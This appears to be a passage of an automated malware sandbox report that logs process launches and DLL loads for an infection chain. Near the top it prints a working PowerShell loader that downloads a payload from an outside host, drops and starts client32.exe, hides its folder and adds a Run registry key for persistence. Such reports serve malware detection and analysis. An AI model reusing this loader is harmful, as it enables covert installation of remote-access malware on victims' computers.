$fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
